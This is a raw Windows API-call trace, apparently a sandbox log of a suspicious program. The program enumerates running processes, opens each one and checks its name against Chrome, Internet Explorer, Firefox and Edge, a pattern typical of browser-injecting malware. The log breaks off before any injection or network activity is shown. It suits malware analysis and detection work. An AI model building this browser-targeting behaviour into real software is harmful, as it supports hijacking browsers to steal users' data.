	[0203.036] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0203.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2458
	[0203.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.037] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0203.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.037] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.037] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0203.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.038] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.038] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0203.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x245c
	[0203.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.039] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0203.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.039] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.039] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0203.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.040] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.040] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0203.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2460
	[0203.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.041] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0203.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.041] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.041] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0203.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.042] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.042] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0203.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2464
	[0203.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.043] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.043] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.043] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.043] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.044] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2468
	[0203.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.044] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.045] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.045] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.045] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.045] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x246c
	[0203.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.046] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.047] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.047] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.047] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.047] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2470
	[0203.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.048] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.049] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.049] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.049] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.049] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2474
	[0203.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.051] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.051] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.051] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.052] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.052] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.052] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2478
	[0203.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.053] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.053] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.053] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.053] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.054] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x247c
	[0203.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.054] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.055] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.055] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.055] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.056] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.056] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2480
	[0203.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.056] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.057] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.057] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.057] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.058] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0203.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2484
	[0203.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.058] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0203.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.059] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.059] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0203.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.059] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.060] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2488
	[0203.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.060] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.061] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.061] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.061] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.061] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0203.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x248c
	[0203.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.062] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.063] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.063] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.063] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.063] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2490
	[0203.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.064] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.065] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.065] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.065] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.065] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.069] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2494
	[0203.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.069] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.070] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.070] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.070] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.071] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0203.071] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2498
	[0203.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.071] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0203.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.072] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.072] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0203.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.072] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.073] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0203.073] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x249c
	[0203.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.073] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0203.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.074] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.074] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0203.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.074] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.075] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0203.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x24a0
	[0203.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.075] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.076] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.076] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.076] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.076] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0203.077] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x24a4
	[0203.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.077] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0203.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.078] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.078] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0203.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.078] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.078] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0203.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0203.079] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0203.080] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x24a8
	[0203.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.080] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0203.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.080] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.081] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0203.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.082] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.083] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0203.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x24ac
	[0203.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.084] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0203.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.084] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.085] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0203.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.085] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.085] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0203.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x24b0
	[0203.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.086] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0203.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.086] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.086] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0203.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.087] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.087] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0203.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x24b4
	[0203.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.088] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0203.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.088] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.088] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0203.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.089] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.089] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0203.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x24b8
	[0203.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.090] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
